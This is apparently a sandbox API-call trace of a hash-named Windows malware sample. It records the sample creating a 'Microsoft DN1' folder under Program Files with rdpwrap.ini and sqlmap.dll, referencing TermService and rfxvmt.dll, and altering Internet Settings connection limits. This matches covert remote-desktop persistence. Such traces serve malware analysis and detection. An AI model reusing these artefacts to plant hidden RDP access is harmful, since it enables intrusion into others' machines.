[0198.871] lstrcmpA (lpString1="DdeSetQualityOfService", lpString2="GetRawInputData") returned -1
[0198.871] lstrcmpA (lpString1="DdeSetUserHandle", lpString2="GetRawInputData") returned -1
[0198.871] lstrcmpA (lpString1="DdeUnaccessData", lpString2="GetRawInputData") returned -1
[0198.871] lstrcmpA (lpString1="DdeUninitialize", lpString2="GetRawInputData") returned -1
[0198.871] lstrcmpA (lpString1="DefDlgProcA", lpString2="GetRawInputData") returned -1
[0198.871] lstrcmpA (lpString1="DefDlgProcW", lpString2="GetRawInputData") returned -1
[0198.871] lstrcmpA (lpString1="DefFrameProcA", lpString2="GetRawInputData") returned -1
[0198.871] lstrcmpA (lpString1="DefFrameProcW", lpString2="GetRawInputData") returned -1
[0198.871] lstrcmpA (lpString1="DefMDIChildProcA", lpString2="GetRawInputData") returned -1
[0198.871] lstrcmpA (lpString1="DefMDIChildProcW", lpString2="GetRawInputData") returned -1
[0198.871] lstrcmpA (lpString1="DefRawInputProc", lpString2="GetRawInputData") returned -1
[0198.871] lstrcmpA (lpString1="DefWindowProcA", lpString2="GetRawInputData") returned -1
[0198.871] lstrcmpA (lpString1="DefWindowProcW", lpString2="GetRawInputData") returned -1
[0198.871] lstrcmpA (lpString1="DeferWindowPos", lpString2="GetRawInputData") returned -1
[0198.871] lstrcmpA (lpString1="DeferWindowPosAndBand", lpString2="GetRawInputData") returned -1
[0198.871] lstrcmpA (lpString1="DeleteMenu", lpString2="GetRawInputData") returned -1
[0198.872] lstrcmpA (lpString1="DeregisterShellHookWindow", lpString2="GetRawInputData") returned -1
[0198.872] lstrcmpA (lpString1="DestroyAcceleratorTable", lpString2="GetRawInputData") returned -1
[0198.872] lstrcmpA (lpString1="DestroyCaret", lpString2="GetRawInputData") returned -1
[0198.872] lstrcmpA (lpString1="DestroyCursor", lpString2="GetRawInputData") returned -1
[0198.872] lstrcmpA (lpString1="DestroyDCompositionHwndTarget", lpString2="GetRawInputData") returned -1
[0198.872] lstrcmpA (lpString1="DestroyIcon", lpString2="GetRawInputData") returned -1
[0198.872] lstrcmpA (lpString1="DestroyMenu", lpString2="GetRawInputData") returned -1
[0198.872] lstrcmpA (lpString1="DestroyReasons", lpString2="GetRawInputData") returned -1
[0198.872] lstrcmpA (lpString1="DestroyWindow", lpString2="GetRawInputData") returned -1
[0198.872] lstrcmpA (lpString1="DialogBoxIndirectParamA", lpString2="GetRawInputData") returned -1
[0198.872] lstrcmpA (lpString1="DialogBoxIndirectParamAorW", lpString2="GetRawInputData") returned -1
[0198.872] lstrcmpA (lpString1="DialogBoxIndirectParamW", lpString2="GetRawInputData") returned -1
[0198.872] lstrcmpA (lpString1="DialogBoxParamA", lpString2="GetRawInputData") returned -1
[0198.872] lstrcmpA (lpString1="DialogBoxParamW", lpString2="GetRawInputData") returned -1
[0198.872] lstrcmpA (lpString1="DisableProcessWindowsGhosting", lpString2="GetRawInputData") returned -1
[0198.872] lstrcmpA (lpString1="DispatchMessageA", lpString2="GetRawInputData") returned -1
[0198.872] lstrcmpA (lpString1="DispatchMessageW", lpString2="GetRawInputData") returned -1
[0198.872] lstrcmpA (lpString1="DisplayConfigGetDeviceInfo", lpString2="GetRawInputData") returned -1
[0198.872] lstrcmpA (lpString1="DisplayConfigSetDeviceInfo", lpString2="GetRawInputData") returned -1
[0198.872] lstrcmpA (lpString1="DisplayExitWindowsWarnings", lpString2="GetRawInputData") returned -1
[0198.872] lstrcmpA (lpString1="DlgDirListA", lpString2="GetRawInputData") returned -1
[0198.872] lstrcmpA (lpString1="DlgDirListComboBoxA", lpString2="GetRawInputData") returned -1
[0198.872] lstrcmpA (lpString1="DlgDirListComboBoxW", lpString2="GetRawInputData") returned -1
[0198.872] lstrcmpA (lpString1="DlgDirListW", lpString2="GetRawInputData") returned -1
[0198.872] lstrcmpA (lpString1="DlgDirSelectComboBoxExA", lpString2="GetRawInputData") returned -1
[0198.872] lstrcmpA (lpString1="DlgDirSelectComboBoxExW", lpString2="GetRawInputData") returned -1
[0198.872] lstrcmpA (lpString1="DlgDirSelectExA", lpString2="GetRawInputData") returned -1
[0198.872] lstrcmpA (lpString1="DlgDirSelectExW", lpString2="GetRawInputData") returned -1
[0198.872] lstrcmpA (lpString1="DoSoundConnect", lpString2="GetRawInputData") returned -1
[0198.872] lstrcmpA (lpString1="DoSoundDisconnect", lpString2="GetRawInputData") returned -1
[0198.872] lstrcmpA (lpString1="DragDetect", lpString2="GetRawInputData") returned -1
[0198.872] lstrcmpA (lpString1="DragObject", lpString2="GetRawInputData") returned -1
[0198.873] lstrcmpA (lpString1="DrawAnimatedRects", lpString2="GetRawInputData") returned -1
[0198.873] lstrcmpA (lpString1="DrawCaption", lpString2="GetRawInputData") returned -1
[0198.873] lstrcmpA (lpString1="DrawCaptionTempA", lpString2="GetRawInputData") returned -1
[0198.873] lstrcmpA (lpString1="DrawCaptionTempW", lpString2="GetRawInputData") returned -1
[0198.873] lstrcmpA (lpString1="DrawEdge", lpString2="GetRawInputData") returned -1
[0198.873] lstrcmpA (lpString1="DrawFocusRect", lpString2="GetRawInputData") returned -1
[0198.873] lstrcmpA (lpString1="DrawFrame", lpString2="GetRawInputData") returned -1
[0198.873] lstrcmpA (lpString1="DrawFrameControl", lpString2="GetRawInputData") returned -1
[0198.873] lstrcmpA (lpString1="DrawIcon", lpString2="GetRawInputData") returned -1
[0198.873] lstrcmpA (lpString1="DrawIconEx", lpString2="GetRawInputData") returned -1
[0198.873] lstrcmpA (lpString1="DrawMenuBar", lpString2="GetRawInputData") returned -1
[0198.873] lstrcmpA (lpString1="DrawMenuBarTemp", lpString2="GetRawInputData") returned -1
[0198.873] lstrcmpA (lpString1="DrawStateA", lpString2="GetRawInputData") returned -1
[0198.873] lstrcmpA (lpString1="DrawStateW", lpString2="GetRawInputData") returned -1
[0198.873] lstrcmpA (lpString1="DrawTextA", lpString2="GetRawInputData") returned -1
[0198.873] lstrcmpA (lpString1="DrawTextExA", lpString2="GetRawInputData") returned -1
[0198.873] lstrcmpA (lpString1="DrawTextExW", lpString2="GetRawInputData") returned -1
[0198.873] lstrcmpA (lpString1="DrawTextW", lpString2="GetRawInputData") returned -1
[0198.873] lstrcmpA (lpString1="DwmGetDxSharedSurface", lpString2="GetRawInputData") returned -1
[0198.873] lstrcmpA (lpString1="DwmGetRemoteSessionOcclusionEvent", lpString2="GetRawInputData") returned -1
[0198.873] lstrcmpA (lpString1="DwmGetRemoteSessionOcclusionState", lpString2="GetRawInputData") returned -1
[0198.873] lstrcmpA (lpString1="DwmKernelShutdown", lpString2="GetRawInputData") returned -1
[0198.873] lstrcmpA (lpString1="DwmKernelStartup", lpString2="GetRawInputData") returned -1
[0198.873] lstrcmpA (lpString1="DwmLockScreenUpdates", lpString2="GetRawInputData") returned -1
[0198.873] lstrcmpA (lpString1="DwmValidateWindow", lpString2="GetRawInputData") returned -1
[0198.873] lstrcmpA (lpString1="EditWndProc", lpString2="GetRawInputData") returned -1
[0198.873] lstrcmpA (lpString1="EmptyClipboard", lpString2="GetRawInputData") returned -1
[0198.873] lstrcmpA (lpString1="EnableChildWindowDpiMessage", lpString2="GetRawInputData") returned -1
[0198.873] lstrcmpA (lpString1="EnableMenuItem", lpString2="GetRawInputData") returned -1
[0198.873] lstrcmpA (lpString1="EnableMouseInPointer", lpString2="GetRawInputData") returned -1
[0198.873] lstrcmpA (lpString1="EnableScrollBar", lpString2="GetRawInputData") returned -1
[0198.873] lstrcmpA (lpString1="EnableSessionForMMCSS", lpString2="GetRawInputData") returned -1
[0198.873] lstrcmpA (lpString1="EnableWindow", lpString2="GetRawInputData") returned -1
[0198.873] lstrcmpA (lpString1="EndDeferWindowPos", lpString2="GetRawInputData") returned -1
[0198.874] lstrcmpA (lpString1="EndDeferWindowPosEx", lpString2="GetRawInputData") returned -1
[0198.874] lstrcmpA (lpString1="EndDialog", lpString2="GetRawInputData") returned -1
[0198.874] lstrcmpA (lpString1="EndMenu", lpString2="GetRawInputData") returned -1
[0198.874] lstrcmpA (lpString1="EndPaint", lpString2="GetRawInputData") returned -1
[0198.874] lstrcmpA (lpString1="EndTask", lpString2="GetRawInputData") returned -1
[0198.874] lstrcmpA (lpString1="EnterReaderModeHelper", lpString2="GetRawInputData") returned -1
[0198.874] lstrcmpA (lpString1="EnumChildWindows", lpString2="GetRawInputData") returned -1
[0198.874] lstrcmpA (lpString1="EnumClipboardFormats", lpString2="GetRawInputData") returned -1
[0198.874] lstrcmpA (lpString1="EnumDesktopWindows", lpString2="GetRawInputData") returned -1
[0198.874] lstrcmpA (lpString1="EnumDesktopsA", lpString2="GetRawInputData") returned -1
[0198.874] lstrcmpA (lpString1="EnumDesktopsW", lpString2="GetRawInputData") returned -1
[0198.874] lstrcmpA (lpString1="EnumDisplayDevicesA", lpString2="GetRawInputData") returned -1
[0198.874] lstrcmpA (lpString1="EnumDisplayDevicesW", lpString2="GetRawInputData") returned -1
[0198.874] lstrcmpA (lpString1="EnumDisplayMonitors", lpString2="GetRawInputData") returned -1
[0198.874] lstrcmpA (lpString1="EnumDisplaySettingsA", lpString2="GetRawInputData") returned -1
[0198.874] lstrcmpA (lpString1="EnumDisplaySettingsExA", lpString2="GetRawInputData") returned -1
[0198.874] lstrcmpA (lpString1="EnumDisplaySettingsExW", lpString2="GetRawInputData") returned -1
[0198.874] GetProcessHeap () returned 0x7c0000
[0198.874] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0x18) returned 0x7d69b8
[0198.874] lstrlenW (lpString="TermService") returned 11
[0198.875] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x24c0000
[0198.875] lstrlenW (lpString="TermService") returned 11
[0198.875] lstrcpyW (in: lpString1=0x24c0000, lpString2="TermService" | out: lpString1="TermService") returned="TermService"
[0198.875] lstrlenW (lpString="TermService") returned 11
[0198.875] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0x24d0000
[0198.875] lstrcatW (in: lpString1="", lpString2="TermService" | out: lpString1="TermService") returned="TermService"
[0198.875] VirtualFree (lpAddress=0x24c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0198.876] lstrlenW (lpString="%ProgramFiles%") returned 14
[0198.876] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x24c0000
[0198.877] lstrlenW (lpString="%ProgramFiles%") returned 14
[0198.877] lstrcpyW (in: lpString1=0x24c0000, lpString2="%ProgramFiles%" | out: lpString1="%ProgramFiles%") returned="%ProgramFiles%"
[0198.877] lstrlenW (lpString="%ProgramFiles%") returned 14
[0198.877] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x24e0000
[0198.877] lstrcatW (in: lpString1="", lpString2="%ProgramFiles%" | out: lpString1="%ProgramFiles%") returned="%ProgramFiles%"
[0198.877] VirtualFree (lpAddress=0x24c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0198.878] lstrlenW (lpString="%windir%\\System32") returned 17
[0198.878] VirtualAlloc (lpAddress=0x0, dwSize=0x24, flAllocationType=0x3000, flProtect=0x4) returned 0x24c0000
[0198.878] lstrlenW (lpString="%windir%\\System32") returned 17
[0198.878] lstrcpyW (in: lpString1=0x24c0000, lpString2="%windir%\\System32" | out: lpString1="%windir%\\System32") returned="%windir%\\System32"
[0198.878] ExpandEnvironmentStringsW (in: lpSrc="%windir%\\System32", lpDst=0x19fb00, nSize=0x1ff | out: lpDst="C:\\Windows\\System32") returned 0x14
[0198.878] lstrlenW (lpString="C:\\Windows\\System32") returned 19
[0198.878] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x24f0000
[0198.878] lstrlenW (lpString="C:\\Windows\\System32") returned 19
[0198.878] lstrcpyW (in: lpString1=0x24f0000, lpString2="C:\\Windows\\System32" | out: lpString1="C:\\Windows\\System32") returned="C:\\Windows\\System32"
[0198.878] lstrlenW (lpString="C:\\Windows\\System32") returned 19
[0198.878] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x2500000
[0198.879] lstrcpyW (in: lpString1=0x2500000, lpString2="C:\\Windows\\System32" | out: lpString1="C:\\Windows\\System32") returned="C:\\Windows\\System32"
[0198.879] VirtualFree (lpAddress=0x24f0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0198.879] VirtualFree (lpAddress=0x24c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0198.880] GetCurrentProcess () returned 0xffffffff
[0198.880] GetModuleHandleA (lpModuleName="kernel32") returned 0x76720000
[0198.880] GetProcAddress (hModule=0x76720000, lpProcName="IsWow64Process") returned 0x76739f10
[0198.880] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19fef0 | out: Wow64Process=0x19fef0*=1) returned 1
[0198.880] VirtualFree (lpAddress=0x24e0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0198.880] lstrlenW (lpString="%ProgramW6432%") returned 14
[0198.880] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x24c0000
[0198.881] lstrlenW (lpString="%ProgramW6432%") returned 14
[0198.881] lstrcpyW (in: lpString1=0x24c0000, lpString2="%ProgramW6432%" | out: lpString1="%ProgramW6432%") returned="%ProgramW6432%"
[0198.881] lstrlenW (lpString="%ProgramW6432%") returned 14
[0198.881] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x24e0000
[0198.881] lstrcatW (in: lpString1="", lpString2="%ProgramW6432%" | out: lpString1="%ProgramW6432%") returned="%ProgramW6432%"
[0198.881] VirtualFree (lpAddress=0x24c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0198.882] ExpandEnvironmentStringsW (in: lpSrc="%ProgramW6432%", lpDst=0x19fb00, nSize=0x1ff | out: lpDst="C:\\Program Files") returned 0x11
[0198.882] lstrlenW (lpString="C:\\Program Files") returned 16
[0198.882] VirtualAlloc (lpAddress=0x0, dwSize=0x22, flAllocationType=0x3000, flProtect=0x4) returned 0x24c0000
[0198.882] lstrlenW (lpString="C:\\Program Files") returned 16
[0198.882] lstrcpyW (in: lpString1=0x24c0000, lpString2="C:\\Program Files" | out: lpString1="C:\\Program Files") returned="C:\\Program Files"
[0198.882] lstrlenW (lpString="C:\\Program Files") returned 16
[0198.882] VirtualAlloc (lpAddress=0x0, dwSize=0x22, flAllocationType=0x3000, flProtect=0x4) returned 0x24f0000
[0198.882] lstrcpyW (in: lpString1=0x24f0000, lpString2="C:\\Program Files" | out: lpString1="C:\\Program Files") returned="C:\\Program Files"
[0198.882] VirtualFree (lpAddress=0x24c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0198.883] VirtualFree (lpAddress=0x24e0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0198.883] lstrlenW (lpString="%ProgramFiles%") returned 14
[0198.883] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x24c0000
[0198.883] lstrlenW (lpString="%ProgramFiles%") returned 14
[0198.883] lstrcpyW (in: lpString1=0x24c0000, lpString2="%ProgramFiles%" | out: lpString1="%ProgramFiles%") returned="%ProgramFiles%"
[0198.883] lstrlenW (lpString="%ProgramFiles%") returned 14
[0198.883] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x24e0000
[0198.883] lstrcatW (in: lpString1="", lpString2="%ProgramFiles%" | out: lpString1="%ProgramFiles%") returned="%ProgramFiles%"
[0198.884] VirtualFree (lpAddress=0x24c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0198.884] lstrlenW (lpString="\\Microsoft DN1") returned 14
[0198.884] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x24c0000
[0198.884] lstrlenW (lpString="\\Microsoft DN1") returned 14
[0198.884] lstrcpyW (in: lpString1=0x24c0000, lpString2="\\Microsoft DN1" | out: lpString1="\\Microsoft DN1") returned="\\Microsoft DN1"
[0198.884] lstrlenW (lpString="\\Microsoft DN1") returned 14
[0198.884] lstrlenW (lpString="C:\\Program Files") returned 16
[0198.884] VirtualQuery (in: lpAddress=0x24f0000, lpBuffer=0x19fea4, dwLength=0x1c | out: lpBuffer=0x19fea4*(BaseAddress=0x24f0000, AllocationBase=0x24f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
[0198.884] VirtualAlloc (lpAddress=0x0, dwSize=0x40, flAllocationType=0x3000, flProtect=0x4) returned 0x2510000
[0198.885] VirtualFree (lpAddress=0x24f0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0198.885] lstrcatW (in: lpString1="C:\\Program Files", lpString2="\\Microsoft DN1" | out: lpString1="C:\\Program Files\\Microsoft DN1") returned="C:\\Program Files\\Microsoft DN1"
[0198.885] VirtualFree (lpAddress=0x24c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0198.885] lstrlenW (lpString="\\Microsoft DN1") returned 14
[0198.885] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x24c0000
[0198.886] lstrlenW (lpString="\\Microsoft DN1") returned 14
[0198.886] lstrcpyW (in: lpString1=0x24c0000, lpString2="\\Microsoft DN1" | out: lpString1="\\Microsoft DN1") returned="\\Microsoft DN1"
[0198.886] lstrlenW (lpString="\\Microsoft DN1") returned 14
[0198.886] lstrlenW (lpString="%ProgramFiles%") returned 14
[0198.886] VirtualQuery (in: lpAddress=0x24e0000, lpBuffer=0x19fea4, dwLength=0x1c | out: lpBuffer=0x19fea4*(BaseAddress=0x24e0000, AllocationBase=0x24e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
[0198.886] VirtualAlloc (lpAddress=0x0, dwSize=0x3c, flAllocationType=0x3000, flProtect=0x4) returned 0x24f0000
[0198.886] VirtualFree (lpAddress=0x24e0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0198.886] lstrcatW (in: lpString1="%ProgramFiles%", lpString2="\\Microsoft DN1" | out: lpString1="%ProgramFiles%\\Microsoft DN1") returned="%ProgramFiles%\\Microsoft DN1"
[0198.886] VirtualFree (lpAddress=0x24c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0198.887] lstrlenW (lpString="\\rfxvmt.dll") returned 11
[0198.887] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x24c0000
[0198.887] lstrlenW (lpString="\\rfxvmt.dll") returned 11
[0198.887] lstrcpyW (in: lpString1=0x24c0000, lpString2="\\rfxvmt.dll" | out: lpString1="\\rfxvmt.dll") returned="\\rfxvmt.dll"
[0198.887] lstrlenW (lpString="\\rfxvmt.dll") returned 11
[0198.887] lstrlenW (lpString="C:\\Windows\\System32") returned 19
[0198.887] VirtualQuery (in: lpAddress=0x2500000, lpBuffer=0x19fea4, dwLength=0x1c | out: lpBuffer=0x19fea4*(BaseAddress=0x2500000, AllocationBase=0x2500000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
[0198.887] VirtualAlloc (lpAddress=0x0, dwSize=0x40, flAllocationType=0x3000, flProtect=0x4) returned 0x24e0000
[0198.887] VirtualFree (lpAddress=0x2500000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0198.888] lstrcatW (in: lpString1="C:\\Windows\\System32", lpString2="\\rfxvmt.dll" | out: lpString1="C:\\Windows\\System32\\rfxvmt.dll") returned="C:\\Windows\\System32\\rfxvmt.dll"
[0198.888] VirtualFree (lpAddress=0x24c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0198.888] SHCreateDirectoryExW (hwnd=0x0, pszPath="C:\\Program Files\\Microsoft DN1" (normalized: "c:\\program files\\microsoft dn1"), psa=0x0) returned 0
[0198.910] lstrlenW (lpString="C:\\Program Files\\Microsoft DN1") returned 30
[0198.910] VirtualAlloc (lpAddress=0x0, dwSize=0x3e, flAllocationType=0x3000, flProtect=0x4) returned 0x2500000
[0198.910] lstrcpyW (in: lpString1=0x2500000, lpString2="C:\\Program Files\\Microsoft DN1" | out: lpString1="C:\\Program Files\\Microsoft DN1") returned="C:\\Program Files\\Microsoft DN1"
[0198.910] lstrlenW (lpString="\\rdpwrap.ini") returned 12
[0198.910] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0x2520000
[0198.910] lstrlenW (lpString="\\rdpwrap.ini") returned 12
[0198.910] lstrcpyW (in: lpString1=0x2520000, lpString2="\\rdpwrap.ini" | out: lpString1="\\rdpwrap.ini") returned="\\rdpwrap.ini"
[0198.910] lstrlenW (lpString="\\rdpwrap.ini") returned 12
[0198.910] lstrlenW (lpString="C:\\Program Files\\Microsoft DN1") returned 30
[0198.910] VirtualQuery (in: lpAddress=0x2500000, lpBuffer=0x19fea4, dwLength=0x1c | out: lpBuffer=0x19fea4*(BaseAddress=0x2500000, AllocationBase=0x2500000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
[0198.910] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2530000
[0198.911] VirtualFree (lpAddress=0x2500000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0198.912] lstrcatW (in: lpString1="C:\\Program Files\\Microsoft DN1", lpString2="\\rdpwrap.ini" | out: lpString1="C:\\Program Files\\Microsoft DN1\\rdpwrap.ini") returned="C:\\Program Files\\Microsoft DN1\\rdpwrap.ini"
[0198.912] VirtualFree (lpAddress=0x2520000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0198.913] lstrlenW (lpString="\\sqlmap.dll") returned 11
[0198.913] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x2500000
[0198.913] lstrlenW (lpString="\\sqlmap.dll") returned 11
[0198.913] lstrcpyW (in: lpString1=0x2500000, lpString2="\\sqlmap.dll" | out: lpString1="\\sqlmap.dll") returned="\\sqlmap.dll"
[0198.913] lstrlenW (lpString="\\sqlmap.dll") returned 11
[0198.913] lstrlenW (lpString="C:\\Program Files\\Microsoft DN1") returned 30
[0198.913] VirtualQuery (in: lpAddress=0x2510000, lpBuffer=0x19fea4, dwLength=0x1c | out: lpBuffer=0x19fea4*(BaseAddress=0x2510000, AllocationBase=0x2510000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
[0198.914] VirtualAlloc (lpAddress=0x0, dwSize=0x56, flAllocationType=0x3000, flProtect=0x4) returned 0x2520000
[0198.914] VirtualFree (lpAddress=0x2510000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0198.915] lstrcatW (in: lpString1="C:\\Program Files\\Microsoft DN1", lpString2="\\sqlmap.dll" | out: lpString1="C:\\Program Files\\Microsoft DN1\\sqlmap.dll") returned="C:\\Program Files\\Microsoft DN1\\sqlmap.dll"
[0198.915] VirtualFree (lpAddress=0x2500000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0198.915] lstrlenW (lpString="\\sqlmap.dll") returned 11
[0198.915] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x2500000
[0198.916] lstrlenW (lpString="\\sqlmap.dll") returned 11
[0198.916] lstrcpyW (in: lpString1=0x2500000, lpString2="\\sqlmap.dll" | out: lpString1="\\sqlmap.dll") returned="\\sqlmap.dll"
[0198.916] lstrlenW (lpString="\\sqlmap.dll") returned 11
[0198.916] lstrlenW (lpString="%ProgramFiles%\\Microsoft DN1") returned 28
[0198.916] VirtualQuery (in: lpAddress=0x24f0000, lpBuffer=0x19fea4, dwLength=0x1c | out: lpBuffer=0x19fea4*(BaseAddress=0x24f0000, AllocationBase=0x24f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
[0198.916] VirtualAlloc (lpAddress=0x0, dwSize=0x52, flAllocationType=0x3000, flProtect=0x4) returned 0x2510000
[0198.916] VirtualFree (lpAddress=0x24f0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0198.917] lstrcatW (in: lpString1="%ProgramFiles%\\Microsoft DN1", lpString2="\\sqlmap.dll" | out: lpString1="%ProgramFiles%\\Microsoft DN1\\sqlmap.dll") returned="%ProgramFiles%\\Microsoft DN1\\sqlmap.dll"
[0198.917] VirtualFree (lpAddress=0x2500000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0198.975] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x24f0000
[0198.976] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x260
[0198.976] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x54dba4 | out: lpWSAData=0x54dba4) returned 0
[0199.005] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x2500000
[0199.006] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x27c
[0199.006] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x54dd84 | out: lpWSAData=0x54dd84) returned 0
[0199.006] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x280
[0199.006] GetModuleHandleA (lpModuleName=0x0) returned 0x400000
[0199.006] GetTickCount () returned 0x1905162
[0199.006] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x19f9d0, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\7907827ba244123ddc19a986203a2df7f7b9e7d984ff8efe6715372e2f431062.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\7907827ba244123ddc19a986203a2df7f7b9e7d984ff8efe6715372e2f431062.exe")) returned 0x62
[0199.006] GetProcessHeap () returned 0x7c0000
[0199.006] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0x400000) returned 0x254c020
[0199.019] CreateFileA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\7907827ba244123ddc19a986203a2df7f7b9e7d984ff8efe6715372e2f431062.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\7907827ba244123ddc19a986203a2df7f7b9e7d984ff8efe6715372e2f431062.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x284
[0199.019] GetFileSize (in: hFile=0x284, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd2a00
[0199.019] ReadFile (in: hFile=0x284, lpBuffer=0x254c020, nNumberOfBytesToRead=0xd2a00, lpNumberOfBytesRead=0x19f8c4, lpOverlapped=0x0 | out: lpBuffer=0x254c020*, lpNumberOfBytesRead=0x19f8c4*=0xd2a00, lpOverlapped=0x0) returned 1
[0199.035] CloseHandle (hObject=0x284) returned 1
[0199.035] GetProcessHeap () returned 0x7c0000
[0199.035] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0x20) returned 0x7dc6b8
[0199.035] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName="\nÖ\x1d¼") returned 0x284
[0199.036] GetLastError () returned 0x0
[0199.036] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x19f8e0, lpdwDisposition=0x19f8f4 | out: phkResult=0x19f8e0*=0x288, lpdwDisposition=0x19f8f4*=0x2) returned 0x0
[0199.036] RegSetValueExA (in: hKey=0x288, lpValueName="MaxConnectionsPer1_0Server", Reserved=0x0, dwType=0x4, lpData=0x19f8ec*=0xa, cbData=0x4 | out: lpData=0x19f8ec*=0xa) returned 0x0
[0199.037] RegSetValueExA (in: hKey=0x288, lpValueName="MaxConnectionsPerServer", Reserved=0x0, dwType=0x4, lpData=0x19f8ec*=0xa, cbData=0x4 | out: lpData=0x19f8ec*=0xa) returned 0x0
[0199.037] RegCloseKey (hKey=0x288) returned 0x0
[0199.037] Sleep (dwMilliseconds=0x1f4)
[0199.552] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x288
[0199.552] GetProcessHeap () returned 0x7c0000
[0199.552] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0xf4) returned 0x7f1490
[0199.555] GetProcessHeap () returned 0x7c0000
[0199.555] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x400) returned 0x7f1590
[0199.555] GetProcessHeap () returned 0x7c0000
[0199.555] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x13000) returned 0x7f1998
[0199.557] GetProcessHeap () returned 0x7c0000
[0199.557] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x13000) returned 0x8049a0
[0199.559] GetProcessHeap () returned 0x7c0000
[0199.561] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7f1998 | out: hHeap=0x7c0000) returned 1
[0199.561] GetProcessHeap () returned 0x7c0000
